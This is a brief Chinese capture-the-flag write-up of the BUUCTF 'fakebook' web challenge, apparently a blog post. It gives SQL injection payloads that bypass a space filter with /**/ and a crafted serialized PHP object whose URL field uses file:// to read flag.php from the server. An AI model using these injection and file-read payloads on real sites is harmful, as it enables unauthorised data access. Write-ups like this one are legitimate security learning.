2019-10-22 BUUCTF Web fakebook WriteUp

廢話:好久沒(méi)寫(xiě)WP了(WTM忘了......)

第一步,發(fā)現(xiàn)view.php存在SQL注入,簡(jiǎn)單的過(guò)濾了空格,用/**/代替繞過(guò)。
payload:
?no=0/**/union/**/select/**/1,2,3,4#
發(fā)現(xiàn)報(bào)錯(cuò),unserialize()說(shuō)明數(shù)據(jù)以序列化字符串存儲(chǔ),報(bào)錯(cuò)信息暴露了網(wǎng)站目錄:/var/www/html/
利用curl不僅可以http、https還可使用file協(xié)議的特性,構(gòu)造反序列字符串即可
第二步,祭出目錄掃描器,發(fā)現(xiàn)robot.txt里有信息,存在user.php.bak源碼泄露
利用user.php成功構(gòu)造序列化字符串
O:8:"UserInfo":3:{s:4:"name";s:1:"a";s:3:"age";i:1;s:4:"blog";s:27:"file:/var/www/html/flag.php";}
payload:

/view.php?no=0/**/union/**/select/**/1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:1:"a";s:3:"age";i:1;s:4:"blog";s:27:"file:/var/www/html/flag.php";}'#

訪問(wèn)發(fā)現(xiàn)讀取欄沒(méi)變化,可把我慌了,查看源代碼


源碼.png

base64解碼后成功得到FLAG

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • WEB2 看源代碼得flag 文件上傳測(cè)試 找一張圖片上傳,截包改后綴名為.php得flag 計(jì)算題 F12修改輸...
    a2dd56f6ad89閱讀 18,637評(píng)論 0 2
  • 官網(wǎng) 中文版本 好的網(wǎng)站 Content-type: text/htmlBASH Section: User ...
    不排版閱讀 4,709評(píng)論 0 5
  • 一、Python簡(jiǎn)介和環(huán)境搭建以及pip的安裝 4課時(shí)實(shí)驗(yàn)課主要內(nèi)容 【Python簡(jiǎn)介】: Python 是一個(gè)...
    _小老虎_閱讀 6,325評(píng)論 0 10
  • 新手練習(xí)區(qū) view-source F12得到flag。 get_post HackBar一把梭。 robots ...
    NoelleMu閱讀 6,303評(píng)論 3 3
  • “刷”簾子被拉開(kāi)了,“趙連諾,你咋還不起床?太陽(yáng)都快曬死你屁股上的細(xì)胞了!你忘了今天是什么日子了?籃球賽!!!快起...
    哎呦哈呢閱讀 209評(píng)論 0 0

友情鏈接更多精彩內(nèi)容